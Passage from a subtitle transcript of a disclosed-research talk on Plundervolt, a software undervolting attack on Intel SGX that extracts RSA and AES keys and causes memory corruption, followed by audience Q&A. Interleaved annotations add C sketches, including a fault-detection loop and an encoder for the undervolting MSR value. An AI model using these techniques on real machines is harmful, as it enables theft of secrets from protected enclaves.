I don't know what it is because I didn't
understand any of that crypto stuff.
266
00:24:08,150 --> 00:24:09,620
Daniel: Me neither.
Kit: But let me have a look at the source
267
00:24:09,620 --> 00:24:15,690
code and see if that exists anywhere in
the source code inside the enclave. It
268
00:24:15,690 --> 00:24:22,180
does. I found p. And if I found p, I can
find q. So just to summarise what I've
269
00:24:22,180 --> 00:24:31,830
done, from a bit flip I have got the
private key out of the SGX enclave and I
270
00:24:31,830 --> 00:24:36,130
shouldn't be able to do that.
Daniel: Yes, yes and I think I have an
271
00:24:36,130 --> 00:24:39,760
idea. So you didn't like the previous...
Kit: Ohh, I know where this is going. Yes.
272
00:24:39,760 --> 00:24:45,980
Daniel: ...didn't like the previous name.
So I came up with something more cute and
273
00:24:45,980 --> 00:24:52,740
relatable, maybe. So I thought, this is an
attack on RSA. So I called it MUFARSA.
274
00:24:52,740 --> 00:24:57,520
Laughter
Daniel: My Undervolting Fault Attack On
275
00:24:57,520 --> 00:24:59,700
RSA.
Kit: That's not even a logo. That's just a
276
00:24:59,700 --> 00:25:02,260
picture of a lion.
Daniel: Yeah, yeah it's, it's sort of...
277
00:25:02,260 --> 00:25:04,660
Kit: Disney are not going to let us use
that.
278
00:25:04,660 --> 00:25:07,429
Laughter
Kit: Well it's not, is it Star Wars? No,
279
00:25:07,429 --> 00:25:10,690
I don't know. OK. OK, so Daniel, I really
enjoyed it.
280
00:25:10,690 --> 00:25:13,670
Daniel: I don't think you will like any of
the names I suggest.
281
00:25:13,670 --> 00:25:17,940
Kit: Probably not. But I really enjoyed
breaking RSA. So what I want to know is
282
00:25:17,940 --> 00:25:19,110
what else can I break?
Daniel: Well...
283
00:25:19,110 --> 00:25:22,750
Kit: Give me something else I can break.
Daniel: If you don't like the RSA part, we
284
00:25:22,750 --> 00:25:28,300
can also take other crypto. I mean there
is AES for instance, AES is a symmetric
285
00:25:28,300 --> 00:25:33,540
key crypto algorithm. Again, you encrypt
messages, you transfer them over a public
286
00:25:33,540 --> 00:25:40,000
channel, this time with both sides having
the key. You can also use that for
287
00:25:40,000 --> 00:25:47,830
storage. AES internally uses a 4x4 state
matrix, 4x4 bytes, and it runs through
288
00:25:47,830 --> 00:25:54,390
ten rounds, which consist of: an S-box, which
basically replaces a byte by another byte,
289
00:25:54,390 --> 00:25:59,030
some shifting of rows in this matrix, some
mixing of the columns, and then the round
290
00:25:59,030 --> 00:26:03,150
key is added, which is computed from the
AES key that you provided to the
291
00:26:03,150 --> 00:26:08,680
algorithm. And if we look at the last
three rounds because we want to, again,
292
00:26:08,680 --> 00:26:12,090
mount a fault attack, and there are
different differential fault attacks on
293
00:26:12,090 --> 00:26:18,410
AES. If you look at the last rounds,
because the way this algorithm works is
294
00:26:18,410 --> 00:26:22,870
it propagates, changes, differences
through this algorithm. If you'd look at
295
00:26:22,870 --> 00:26:28,300
the state matrix, which only has a
difference in the top left corner, then
296
00:26:28,300 --> 00:26:33,830
this is how the state will propagate
through the 9th and 10th round. And you
297
00:26:33,830 --> 00:26:42,470
can put up formulas to compute possible
values for the state up there. If you have
298
00:26:42,470 --> 00:26:47,760
different, if you have encryptions, which
only have a difference there in exactly
299
00:26:47,760 --> 00:26:57,350
that single state byte. Now, how does this
work in practice? Well, today everyone is
300
00:26:57,350 --> 00:27:02,200
using AES-NI because that's super fast.
That's, again, an instruction set
301
00:27:02,200 --> 00:27:07,510
extension by Intel and it's super fast.
Kit: Oh okay, I want to have a go. Right,
302
00:27:07,510 --> 00:27:11,970
so let me have a look if I can break some
of these AES-NI instructions. So I'm going to
303
00:27:11,970 --> 00:27:16,040
come at this slightly differently. Last
time I waited for a multiplication fault,
304
00:27:16,040 --> 00:27:19,710
I'm going to do something slightly
different. What I'm going to do is put in
305
00:27:19,710 --> 00:27:26,680
a loop two AES encryptions. And I wrote
this, I should say we wrote
306
00:27:26,680 --> 00:27:32,760
this, using Intel's example
code. This should never fault. And we know
307
00:27:32,760 --> 00:27:36,580
what we're looking for. What we're looking
for is a fault in the eighth round. So
308
00:27:36,580 --> 00:27:42,370
let's see if we get faults with this. So
the first thing is I'm going to start at
309
00:27:42,370 --> 00:27:47,510
minus 262 millivolt. What's interesting is
that you have to undervolt more when it's
310
00:27:47,510 --> 00:27:57,350
cold so you can tell at what time of day I
ran these. Oh I got a fault, I got a fault.
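The detection loop Kit describes can be sketched roughly as below. In the real PoC the loop body is two AES-NI encryptions of the same plaintext; here a plain multiplication stands in, and the function name is invented for illustration:

```c
#include <stdint.h>

/* Sketch of the fault-detection loop: run the same deterministic
 * computation twice per iteration and compare. At nominal voltage the
 * two results always match; while undervolting, a mismatch flags a
 * faulted iteration whose outputs feed the differential analysis.
 * In the real PoC the body is two AES-NI encryptions, not a multiply. */
static long first_faulty_iteration(uint64_t a, uint64_t b, long iterations) {
    for (long i = 0; i < iterations; i++) {
        uint64_t r1 = a * b;
        uint64_t r2 = a * b;
        if (r1 != r2)
            return i;   /* capture the faulty pair here */
    }
    return -1;          /* no fault observed */
}
```

Without undervolting this loop never reports a fault; the voltage offset is lowered step by step until mismatches start to appear.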
311
00:27:57,350 --> 00:28:01,950
Well, unfortunately... Where did that?
That's actually in the fourth round. I'm,
312
00:28:01,950 --> 00:28:04,480
I'm obviously, eh, fifth round, okay.
Daniel: You can't do anything with that.
313
00:28:04,480 --> 00:28:09,530
Kit: You can't do anything, again in the
fifth round. Can't do anything with that,
314
00:28:09,530 --> 00:28:14,800
fifth round again. Oh! Oh we got one. We
got one in the eighth round. And so it
315
00:28:14,800 --> 00:28:20,710
means I can take these two ciphertexts and
I can use the differential fault attack. I
316
00:28:20,710 --> 00:28:26,620
actually ran this twice in order to get
two pairs of faulty output because it made
317
00:28:26,620 --> 00:28:30,650
it so much easier. And again, thank you to
somebody on the Internet for having
318
00:28:30,650 --> 00:28:34,750
written a differential fault analysis
attack for me. You don't, you don't need
319
00:28:34,750 --> 00:28:39,470
two, but it just makes it easy for the
presentation. So I'm now going to compare.
320
00:28:39,470 --> 00:28:44,690
Let me just pause that a second, I used
somebody else's differential fault attack
321
00:28:44,690 --> 00:28:49,600
and it gave me in one, for the first pair
it gave me 500 possible keys and for the
322
00:28:49,600 --> 00:28:54,470
second it gave me 200 possible keys. I'm
overlapping them. And there was only one
323
00:28:54,470 --> 00:28:59,860
key that matched both. And that's the key
that came out. And let's just again check
324
00:28:59,860 --> 00:29:05,970
inside the source code, does that key
exist? What is the key? And yeah, that is
325
00:29:05,970 --> 00:29:09,590
the key. So, again what I've...
Daniel: That is not a very good key,
326
00:29:09,590 --> 00:29:14,210
though.
Kit: No, Ehhh... I think, if you think
327
00:29:14,210 --> 00:29:17,640
about randomness, it's as good as any
other. Anyway, ehhh...
328
00:29:17,640 --> 00:29:21,470
Laughter
Kit: What have I done? I have flipped a
329
00:29:21,470 --> 00:29:29,370
bit inside SGX to create a fault in AES
New Instruction set that has enabled me to
330
00:29:29,370 --> 00:29:33,870
get the AES key out of SGX. You shouldn't
be able to do that.
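The single-byte difference propagation Daniel mentioned (one faulted state byte spreading through the last rounds) can be sketched with standard AES arithmetic; this is not code from the talk:

```c
#include <stdint.h>

/* Multiply by x in GF(2^8) with the AES reduction polynomial 0x11b. */
static uint8_t xtime(uint8_t v) {
    return (uint8_t)((v << 1) ^ ((v >> 7) * 0x1b));
}

/* How a single-byte difference d at the top of a column spreads
 * through MixColumns: the column difference (d,0,0,0) becomes
 * (2d, d, d, 3d). This 1-to-4 spread, followed by ShiftRows in the
 * final round, is what the differential fault analysis equations
 * exploit to narrow down candidates for the last round key. */
static void mixcolumns_single_byte_diff(uint8_t d, uint8_t out[4]) {
    out[0] = xtime(d);                  /* 2*d */
    out[1] = d;                         /* 1*d */
    out[2] = d;                         /* 1*d */
    out[3] = (uint8_t)(xtime(d) ^ d);   /* 3*d */
}
```

Intersecting the candidate key sets from two independent faulty pairs, as Kit did, leaves only the real key.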
331
00:29:33,870 --> 00:29:40,070
Daniel: So. So now that we have multiple
attacks, we should think about a logo and
332
00:29:40,070 --> 00:29:43,280
a name, right?
Kit: This one better be good because the
333
00:29:43,280 --> 00:29:46,960
other one wasn't very good.
Daniel: No, seriously, we are already
334
00:29:46,960 --> 00:29:47,960
soon...
Kit: Okay.
335
00:29:47,960 --> 00:29:51,430
Daniel: We are, we will write this out.
Send this to a conference. People will
336
00:29:51,430 --> 00:29:56,510
like it, right. This is and I already have
a name and a logo for it. Kit: Come on
337
00:29:56,510 --> 00:29:59,350
then.
Daniel: Crypto Vault Screw Hammer.
338
00:29:59,350 --> 00:30:02,540
Laughter
Daniel: It's like, we attack crypto in a
339
00:30:02,540 --> 00:30:07,299
vault, SGX, and it's like a, like the
Clock screw and like Row hammer. And
340
00:30:07,299 --> 00:30:11,610
like...
Kit: I don't think that's very catchy. But
341
00:30:11,610 --> 00:30:19,840
let me tell you, it's not just crypto. So
we're faulting multiplication. So surely
342
00:30:19,840 --> 00:30:23,780
there's another use for this other than
crypto. And this is where something really
343
00:30:23,780 --> 00:30:27,890
interesting happens. For those of you who
are really good at C you can come and
344
00:30:27,890 --> 00:30:33,870
explain this to me later. This is a really
simple bit of C. All I'm doing is getting
345
00:30:33,870 --> 00:30:39,280
an offset of an array and taking the
address of that and putting it into a
346
00:30:39,280 --> 00:30:43,929
pointer. Why is this interesting? Hmmm,
it's interesting because I want to know
347
00:30:43,929 --> 00:30:47,800
what the compiler does with that. So I am
going to wave my magic wand and what the
348
00:30:47,800 --> 00:30:53,030
compiler is going to do is it's going to
make this. Why is that interesting?
349
00:30:53,030 --> 00:30:58,160
Daniel: Simple pointer arithmetic?
Kit: Hmmm. Well, we know that we can fault
350
00:30:58,160 --> 00:31:02,290
multiplications. So we're no longer
looking at crypto. We're now looking at
351
00:31:02,290 --> 00:31:08,860
just memory. So let's see if I can use
this as an attack. So let me try and
352
00:31:08,860 --> 00:31:12,580
explain what's going on here. On the right
hand side, you can see the undervolting.
353
00:31:12,580 --> 00:31:16,240
I'm going to create an enclave and I've
put it in debug mode so that I can see
354
00:31:16,240 --> 00:31:20,360
what's going on. You can see the size of
the enclave because we've got the base and
355
00:31:20,360 --> 00:31:28,750
the limit of it. And if we look at that in
a diagram, what that's saying is here. If
356
00:31:28,750 --> 00:31:34,780
I can write anything at the top above
that, that will no longer be encrypted,
357
00:31:34,780 --> 00:31:41,720
that will be unencrypted. Okay, let's
carry on with that. So, let's just write
358
00:31:41,720 --> 00:31:46,450
that one statement again and again, that
pointer arithmetic again and again and
359
00:31:46,450 --> 00:31:53,059
again whilst I'm undervolting and see what
happens. Oh, suddenly it changed and if
360
00:31:53,059 --> 00:31:57,560
you look at where it's mapped it to, it
has mapped that pointer to memory that is
361
00:31:57,560 --> 00:32:05,560
no longer inside SGX, it has put it into
untrusted memory. So we're just doing the
362
00:32:05,560 --> 00:32:10,420
same statement again and again whilst
undervolting. Besh, we've written
363
00:32:10,420 --> 00:32:14,630
something that was in the enclave out of
the enclave. And I'm just going to display
364
00:32:14,630 --> 00:32:19,350
the page of memory that we've got there to
show you what it was. And there's the one
365
00:32:19,350 --> 00:32:24,580
line, it's deadbeef. And again, I'm just
going to look in my source code to see
366
00:32:24,580 --> 00:32:30,030
what it was. Yeah, it's, you know you
know, endianness blah, blah, blah. I have
367
00:32:30,030 --> 00:32:36,270
now not even used crypto. I have purely
used pointer arithmetic to take something
368
00:32:36,270 --> 00:32:43,140
that was stored inside Intel's SGX and
moved it into user space where anyone can
369
00:32:43,140 --> 00:32:46,380
read it.
Daniel: So, yes, I get your point. It's
370
00:32:46,380 --> 00:32:48,750
more than just crypto, right?
Kit: Yeah.
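The pointer arithmetic Kit showed boils down to base + index * sizeof(element), i.e. a multiplication whose result feeds an address. A hypothetical sketch (struct and function names invented for illustration) of how one flipped bit in that product displaces the pointer:

```c
#include <stddef.h>
#include <stdint.h>

/* A 32-byte element: &array[i] compiles to base + i * 32, so the
 * imul result directly becomes part of the written address. */
typedef struct { uint8_t bytes[32]; } entry_t;

/* How far a single flipped bit in the index computation moves the
 * resulting pointer. With a high enough bit, the faulted address
 * lands outside the enclave's base..limit range, so the enclave
 * writes its secret to plain, untrusted memory. */
static ptrdiff_t displacement_after_bitflip(size_t index, unsigned bit) {
    size_t faulted = index ^ ((size_t)1 << bit);
    return ((ptrdiff_t)faulted - (ptrdiff_t)index) * (ptrdiff_t)sizeof(entry_t);
}
```

A flip of bit 20, for example, moves the write by 32 MiB, easily past an enclave limit.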
371
00:32:48,750 --> 00:32:57,490
Daniel: It's way beyond that. So we, we
leaked RSA keys. We leaked AES keys.
372
00:32:57,490 --> 00:33:01,260
Kit: Go on... Yeah, we did not just that
though we did memory corruption.
373
00:33:01,260 --> 00:33:06,340
Daniel: Okay, so. Yeah. Okay. Crypto Vault
Screw Hammer, point taken, is not the
374
00:33:06,340 --> 00:33:10,980
ideal name, but maybe you could come up
with something. We need a name and a logo.
375
00:33:10,980 --> 00:33:14,250
Kit: So pressures on me then. Right, here
we go. So it's got to be due to
376
00:33:14,250 --> 00:33:20,710
undervolting because we're undervolting.
Maybe we can get a pun on vault and volt
377
00:33:20,710 --> 00:33:26,370
in there somewhere. We're stealing
something, aren't we? We're corrupting
378
00:33:26,370 --> 00:33:30,590
something. Maybe. Maybe we're plundering
something.
379
00:33:30,590 --> 00:33:31,880
Daniel: Yeah?
Kit: I know.
380
00:33:31,880 --> 00:33:32,880
Daniel: No?
381
00:33:32,880 --> 00:33:37,250
Kit: Let's call it plunder volt.
Daniel: Oh, no, no, no. That's not it.
382
00:33:37,250 --> 00:33:38,309
That's not a good name.
Kit: What?
383
00:33:38,309 --> 00:33:42,710
Daniel: That, no. We need something...
That's really not a good name. People will
384
00:33:42,710 --> 00:33:51,080
hate this name.
Kit: Wait, wait, wait, wait, wait.
385
00:33:51,080 --> 00:33:53,870
Daniel: No...
Laughter
386
00:33:53,870 --> 00:33:57,049
Kit: You can read this if you like,
Daniel.
387
00:33:57,049 --> 00:34:01,410
Daniel: Okay. I, I think I get it. I, I
think I get it.
388
00:34:01,410 --> 00:34:16,730
Kit: No, no, I haven't finished.
Laughter
389
00:34:16,730 --> 00:34:35,329
Daniel: Okay. Yeah, this is really also a
very nice comment. Yes. The quality of the
390
00:34:35,329 --> 00:34:37,659
videos, I think you did a very good job
there.
391
00:34:37,659 --> 00:34:40,879
Kit: Thank you.
Daniel: Also, the website really good job
392
00:34:40,879 --> 00:34:42,619
there.
Kit: So, just to summarize, what we've
393
00:34:42,619 --> 00:34:52,539
done with Plundervolt is: it's a new type
of attack, it breaks the integrity of SGX.
394
00:34:52,539 --> 00:34:57,059
It's within SGX. We're doing stuff we
shouldn't be able to.
395
00:34:57,059 --> 00:35:01,050
Daniel: Like AES keys, we leak AES keys,
yeah.
396
00:35:01,050 --> 00:35:06,319
Kit: And we are retrieving the RSA
signature key.
397
00:35:06,319 --> 00:35:11,109
Daniel: Yeah. And yes, we induced memory
corruption in bug free code.
398
00:35:11,109 --> 00:35:20,019
Kit: And we made the enclave write secrets
to untrusted memory. This is the paper,
399
00:35:20,019 --> 00:35:27,609
that's been accepted next year. It is my
first paper, so thank you very much. Kit,
400
00:35:27,609 --> 00:35:29,930
that's me.
Applause
401
00:35:29,930 --> 00:35:38,950
Kit: Thank you. David Oswald, Flavio
Garcia, Jo Van Bulck and of course, the
402
00:35:38,950 --> 00:35:46,411
infamous and Frank Piessens. So all that
really remains for me to do is to say,
403
00:35:46,411 --> 00:35:49,499
thank you very much for coming...
Daniel: Wait a second, wait a second.
404
00:35:49,499 --> 00:35:53,440
There's one more thing, I think you
overlooked one of the tweets I added it
405
00:35:53,440 --> 00:35:56,509
here. You didn't see this slide yet?
Kit: I haven't seen this one.
406
00:35:56,509 --> 00:36:00,900
Daniel: This one, I really like it.
Kit: It's a slightly ponderous pun on
407
00:36:00,900 --> 00:36:06,329
Thunderbolt... pirate themed logo.
Daniel: A pirate themed logo. I really
408
00:36:06,329 --> 00:36:13,079
like it. And if it's a pirate themed logo,
don't you think there should be a pirate
409
00:36:13,079 --> 00:36:16,210
themed song?
Laughter
410
00:36:16,210 --> 00:36:25,349
Kit: Daniel, have you written a pirate
theme song? Go on then, play it. Let's,
411
00:36:25,349 --> 00:36:37,220
let's hear the pirate theme song.
music -- see screen --
412
00:36:37,220 --> 00:37:09,229
Music: ...Volt down me enclaves yo ho. Aye
but it's fixed with a microcode patch.
413
00:37:09,229 --> 00:37:30,369
Volt down me enclaves yo ho.
Daniel: Thanks to...
414
00:37:30,369 --> 00:37:43,869
Applause
Daniel: Thanks to Manuel Weber and also to
415
00:37:43,869 --> 00:37:47,480
my group at TU Graz for volunteering for
the choir.
416
00:37:47,480 --> 00:37:51,980
Laughter
Daniel: And then, I mean, this is now the
417
00:37:51,980 --> 00:37:58,727
last slide. Thank you for your attention.
Thank you for being here. And we would
418
00:37:58,727 --> 00:38:02,369
like to answer questions in the Q&A.
419
00:38:02,369 --> 00:38:07,079
Applause
420
00:38:07,079 --> 00:38:13,789
Herald: Thank you for your great talk. And
thank you some more for the song. If you
421
00:38:13,789 --> 00:38:18,720
have questions, please line up on the
microphones in the room. First question
422
00:38:18,720 --> 00:38:22,640
goes to the signal angel, any question
from the Internet?
423
00:38:22,640 --> 00:38:26,979
Signal-Angel: Not as of now, no.
Herald: All right. Then, microphone number
424
00:38:26,979 --> 00:38:29,800
4, your question please.
Microphone 4: Hi. Thanks for the great
425
00:38:29,800 --> 00:38:34,809
talk. So, why does this happen now? I
mean, thanks for the explanation for wrong
426
00:38:34,809 --> 00:38:38,440
number, but it wasn't clear. What's going
on there?
427
00:38:38,440 --> 00:38:46,890
Daniel: So, if you look at circuits,
for the signal to be ready at the output,
428
00:38:46,890 --> 00:38:53,729
electrons have to travel a bit.
If you increase the voltage, things will
429
00:38:53,729 --> 00:39:00,430
go faster. So they will, you will have the
output signal ready at an earlier point in
430
00:39:00,430 --> 00:39:05,089
time. Now the frequency that you choose
for your processor should be related to
431
00:39:05,089 --> 00:39:08,599
that. So if you choose the frequency too
high, the outputs will not be ready yet at
432
00:39:08,599 --> 00:39:13,319
this circuit. And this is exactly what
happens, if you reduce the voltage the
433
00:39:13,319 --> 00:39:17,489
outputs are not ready yet for the next
clock cycle.
434
00:39:17,489 --> 00:39:22,720
Kit: And interestingly, we couldn't fault
really short instructions. So anything
435
00:39:22,720 --> 00:39:26,400
like an add or an xor, it was basically
impossible to fault. So they had to be
436
00:39:26,400 --> 00:39:30,859
complex instructions that probably weren't
finishing by the time the next clock tick
437
00:39:30,859 --> 00:39:31,950
arrived.
Daniel: Yeah.
438
00:39:31,950 --> 00:39:35,580
Microphone 4: Thank you.
Herald: Thanks for your answer. Microphone
439
00:39:35,580 --> 00:39:38,960
number 4 again.
Microphone 4: Hello. It's a very
440
00:39:38,960 --> 00:39:45,160
interesting theoretical approach I think.
But you were capable to break these crypto
441
00:39:45,160 --> 00:39:53,049
mechanisms, for example, because you could
do zillions of iterations and you are sure
442
00:39:53,049 --> 00:39:57,930
to trigger the fault. But in practice,
say, as someone is having a secure
443
00:39:57,930 --> 00:40:03,859
conversation, is it practical, even close
to possible, to break it with that?
444
00:40:03,859 --> 00:40:08,210
Daniel: It totally depends on your threat
model. So what can you do with the
445
00:40:08,210 --> 00:40:12,789
enclave? If you, we are assuming that we
are running with root privileges here and
446
00:40:12,789 --> 00:40:17,461
a root privileged attacker can certainly
run the enclave with certain inputs, again
447
00:40:17,461 --> 00:40:21,970
and again. If the enclave doesn't have any
protection against replay, then certainly
448
00:40:21,970 --> 00:40:25,759
we can mount an attack like that. Yes.
Microphone 4: Thank you.
449
00:40:25,759 --> 00:40:30,640
Herald: Signal-Angel your question.
Signal: Somebody asked if the attack only
450
00:40:30,640 --> 00:40:33,980
applies to Intel or to AMD or other
architectures as well.
451
00:40:33,980 --> 00:40:37,900
Kit: Oh, good question, I suspect right
now there are people trying this attack on
452
00:40:37,900 --> 00:40:41,599
AMD in the same way that when clock screw
came out, there were an awful lot of
453
00:40:41,599 --> 00:40:46,759
people starting to do stuff on Intel as
well. We saw the clock screw attack on ARM
454
00:40:46,759 --> 00:40:52,460
with frequency. Then we saw ARM with
voltage. Now we've seen Intel with
455
00:40:52,460 --> 00:40:57,369
voltage. And someone else has done similar:
Volt pwn has done something very similar
456
00:40:57,369 --> 00:41:01,799
to us. And I suspect AMD is the next one.
I guess, because it's not out there as
457
00:41:01,799 --> 00:41:06,789
much. We've tried to do them in the order
of, you know, scaring people.
458
00:41:06,789 --> 00:41:10,130
Laughter
Kit: Scaring as many people as possible as
459
00:41:10,130 --> 00:41:13,789
quickly as possible.
Herald: Thank you for the explanation.
460
00:41:13,789 --> 00:41:18,319
Microphone number 4.
Microphone 4: Hi. Hey, great. Thanks for
461
00:41:18,319 --> 00:41:25,339
the presentation. Can you get similar
results by hardware? I mean by tweaking
462
00:41:25,339 --> 00:41:28,309
the voltage that you provide to the CPU
or...
463
00:41:28,309 --> 00:41:32,680
Kit: Well, I refer you to my earlier
answer. I know for a fact that there are
464
00:41:32,680 --> 00:41:37,099
people doing this right now with physical
hardware, seeing what they can do. Yes,
465
00:41:37,099 --> 00:41:40,569
and I think it will not be long before
that paper comes out.
466
00:41:40,569 --> 00:41:46,519
Microphone 4: Thank you.
Herald: Thanks. Microphone number one.
467
00:41:46,519 --> 00:41:51,150
Your question. Sorry, microphone 4 again,
sorry.
468
00:41:51,150 --> 00:41:57,920
Microphone 4: Hey, thanks for the talk.
Two small questions. One, why doesn't
469
00:41:57,920 --> 00:42:07,789
anything break inside SGX when you do
these tricks? And second one, why when you
470
00:42:07,789 --> 00:42:14,539
write outside the enclave's memory, the
value is not encrypted?
471
00:42:14,539 --> 00:42:21,839
Kit: So the enclave is an encrypted area
of memory. So when it points to an
472
00:42:21,839 --> 00:42:24,260
unencrypted address, it's just
going to write it to the unencrypted
473
00:42:24,260 --> 00:42:28,650
memory. Does that make sense?
Daniel: From the enclaves perspective,
474
00:42:28,650 --> 00:42:33,079
none of the memory is encrypted. This is
just transparent to the enclave. So if the
475
00:42:33,079 --> 00:42:36,680
enclave will write to another memory
location. Yes, it just won't be encrypted.
476
00:42:36,680 --> 00:42:40,609
Kit: Yeah. And what's happening is we're
getting flips in the registers. Which is
477
00:42:40,609 --> 00:42:44,079
why I think we're not getting an integrity
check because the enclave is completely
478
00:42:44,079 --> 00:42:48,150
unaware that anything's even gone wrong.
It's got a value in its memory and it's
479
00:42:48,150 --> 00:42:51,230
gonna use it.
Daniel: Yeah. The integrity check is only
480
00:42:51,230 --> 00:42:55,210
on the memory that you load from
RAM. Yeah.
481
00:42:55,210 --> 00:43:02,589
Herald: Okay, microphone number 7.
Microphone 7: Yeah. Thank you. Interesting
482
00:43:02,589 --> 00:43:11,950
work. I was wondering, you showed us the
example of the code that wrote outside the
483
00:43:11,950 --> 00:43:17,229
Enclave Memory using simple pointer
arithmetics. Have you been able to talk to
484
00:43:17,229 --> 00:43:23,559
Intel why this memory access actually
happens? I mean, you showed us the output
485
00:43:23,559 --> 00:43:28,569
of the program. It crashes, but
nevertheless, it writes the result to the
486
00:43:28,569 --> 00:43:34,469
resulting memory address. So there must be
something wrong, like the attack that
487
00:43:34,469 --> 00:43:39,979
happened two years ago at the Congress
about, you know, all that stuff.
488
00:43:39,979 --> 00:43:46,030
Daniel: So generally enclaves can read and
write any memory location in their host
489
00:43:46,030 --> 00:43:52,819
application. We have also published papers
that basically argued that this might not
490
00:43:52,819 --> 00:44:00,140
be a good idea, good design decision. But
that's the current design. And the reason
491
00:44:00,140 --> 00:44:04,849
is that this makes interaction with the
enclave very easy. You can just place your
492
00:44:04,849 --> 00:44:09,279
payload somewhere in the memory. Hand the
pointer to the enclave and the enclave can
493
00:44:09,279 --> 00:44:13,810
use the data from there, maybe copy it
into the enclave memory if necessary, or
494
00:44:13,810 --> 00:44:19,579
directly work on the data. So that's why
this memory access to the normal memory
495
00:44:19,579 --> 00:44:24,500
region is not illegal.
Kit: And if you want to know more, you can
496
00:44:24,500 --> 00:44:29,450
come and find Daniel afterwards.
Herald: Okay. Thanks for the answer.
497
00:44:29,450 --> 00:44:32,730
Signal-Angel, the questions from the
Internet.
498
00:44:32,730 --> 00:44:39,140
Signal-Angel: Yes. The question came up how
stable the system you're attacking with
the hammering
499
00:44:39,140 --> 00:44:42,150
is while you're performing the attack.
500
00:44:42,150 --> 00:44:46,180
Kit: It's really stable. Once I've been
through three months of crashing the
501
00:44:46,180 --> 00:44:49,720
computer. I got to a point where I had a
really, really good frequency voltage
502
00:44:49,720 --> 00:44:55,520
combination. And we did discover on all
Intel chips, it was different. So even, on
503
00:44:55,520 --> 00:44:59,280
what looked like and we bought almost an
identical little nook, we bought one with
504
00:44:59,280 --> 00:45:05,670
exactly the same spec and it had a
different sort of frequency voltage model.
505
00:45:05,670 --> 00:45:09,719
But once we'd done this sort of
benchmarking, you could pretty much do any
506
00:45:09,719 --> 00:45:14,509
attack without it crashing at all.
Daniel: But without this benchmarking,
507
00:45:14,509 --> 00:45:17,729
it's true, we would often reboot.
Kit: That was a nightmare yeah, I wish I'd
508
00:45:17,729 --> 00:45:20,440
done that the beginning. It would've saved
me so much time.
509
00:45:20,440 --> 00:45:25,019
Herald: Thanks again for answering.
Microphone number 4 your question.
510
00:45:25,019 --> 00:45:29,260
Microphone 4: Can Intel fix this with a
microcode update?
511
00:45:29,260 --> 00:45:36,549
Daniel: So, there are different approaches
to this. Of course, the quick fix is to
512
00:45:36,549 --> 00:45:41,690
remove the access to the MSR, which is of
course inconvenient because you can't
513
00:45:41,690 --> 00:45:45,240
undervolt your system anymore. So maybe
you want to choose whether you want to use
514
00:45:45,240 --> 00:45:50,660
SGX or want to have a gaming computer
where you undervolt the system or control
515
00:45:50,660 --> 00:45:56,219
the voltage from software. But is this a
real fix? I don't know. I think there are
516
00:45:56,219 --> 00:45:58,729
more vectors, right?
Kit: Yeah. But, well, I'll be interested to
517
00:45:58,729 --> 00:46:01,210
see what they're going to do with the next
generation of chips.
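For context, the software undervolting interface such a fix would revoke is the undocumented MSR 0x150. The bit layout below is the one reverse engineered in public undervolting tools and the published Plundervolt PoC; it is stated here as an assumption, not something from the talk, and actually applying it requires root and the msr driver (wrmsr):

```c
#include <stdint.h>

/* Assumed layout of a write to the undocumented voltage-offset
 * MSR 0x150 (from public reverse engineering, not Intel docs):
 *   bit 63      : command valid
 *   bits 42:40  : voltage plane (0 = core, 2 = cache, ...)
 *   bits 36:32  : 0x11 = write the offset (0x10 = read it back)
 *   bits 31:21  : offset as 11-bit two's complement, ~0.98 mV units
 */
static uint64_t undervolt_msr_value(unsigned plane, int offset_units) {
    return (1ULL << 63)
         | ((uint64_t)plane << 40)
         | (0x11ULL << 32)
         | (((uint64_t)(int64_t)offset_units << 21) & 0xFFE00000ULL);
}
```

An offset of -102 units is roughly the -100 mV region; writing such values for the core plane while an enclave computes is the whole attack, which is why revoking software access to this MSR is the obvious quick fix.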
518
00:46:01,210 --> 00:46:04,609
Daniel: Yeah.
Herald: All right. Microphone number 7,
519
00:46:04,609 --> 00:46:08,859
what's your question?
Microphone 7: Yes, similarly to the other
520
00:46:08,859 --> 00:46:14,170
question, is there a way you can prevent
such attacks when writing code that runs
521
00:46:14,170 --> 00:46:17,820
in the secure enclave?
Kit: Well, no. That's the interesting
522
00:46:17,820 --> 00:46:22,739
thing, it's really hard to do. Because we
weren't writing code with bugs, we were
523
00:46:22,739 --> 00:46:26,999
just writing normal pointer arithmetic.
Normal crypto. If anywhere in your code,
524
00:46:26,999 --> 00:46:29,549
you're using a multiplication. It can be
attacked.
525
00:46:29,549 --> 00:46:34,750
Daniel: But of course, you could use fault
resistant implementations inside the
526
00:46:34,750 --> 00:46:39,160
enclave. Whether that is a practical
solution is yet to be determined.
527
00:46:39,160 --> 00:46:41,859
Kit: Oh yes, yeah, right, you could write
duplicate code and do comparison things
528
00:46:41,859 --> 00:46:46,829
like that. But if, yeah.
Herald: Okay. Microphone number 3. What's
529
00:46:46,829 --> 00:46:47,829
your question?
530
00:46:47,829 --> 00:46:53,390
Microphone 3: Hi. I can't imagine Intel
being very happy about this and recently
531
00:46:53,390 --> 00:46:57,450
they were under fire for how they were
handling a coordinated disclosure. So can
532
00:46:57,450 --> 00:47:01,299
you summarize your experience?
Kit: They were... They were really nice.
533
00:47:01,299 --> 00:47:06,380
They were really nice. We disclosed really
early, like before we had all of the
534
00:47:06,380 --> 00:47:08,960
attacks.
Daniel: We just had a PoC at that point.
535
00:47:08,960 --> 00:47:11,239
Kit: Yeah.
Daniel: Yeah, simply a PoC. Very simple.
536
00:47:11,239 --> 00:47:14,890
Kit: They've been really nice. They wanted
to know what we were doing. They wanted to
537
00:47:14,890 --> 00:47:18,660
see all our attacks. I found them lovely.
Daniel: Yes.
538
00:47:18,660 --> 00:47:21,880
Kit: Am I allowed to say that?
Laughter
539
00:47:21,880 --> 00:47:24,859
Daniel: I mean, they also have interest
in...
540
00:47:24,859 --> 00:47:26,950
Kit: Yeah.
Daniel ...making these processes smooth.
541
00:47:26,950 --> 00:47:30,279
So that vulnerability researchers also
report to them.
542
00:47:30,279 --> 00:47:32,039
Kit: Yeah.
Daniel: Because if everyone says, oh this
543
00:47:32,039 --> 00:47:37,700
was awful, then they will also not get a
lot of reports. But if they do their job
544
00:47:37,700 --> 00:47:39,849
well and they did in our case.
Kit: Yeah.
545
00:47:39,849 --> 00:47:44,450
Daniel: Then of course, it's nice.
Herald: Okay. Microphone number 4...
546
00:47:44,450 --> 00:47:48,499
Daniel: We even got a bug bounty.
Kit: We did get a bug bounty. I didn't
547
00:47:48,499 --> 00:47:51,499
want to mention that because I haven't
told my university yet.
548
00:47:51,499 --> 00:47:55,430
Laughter
Microphone 4: Thank you. Thank you for the
549
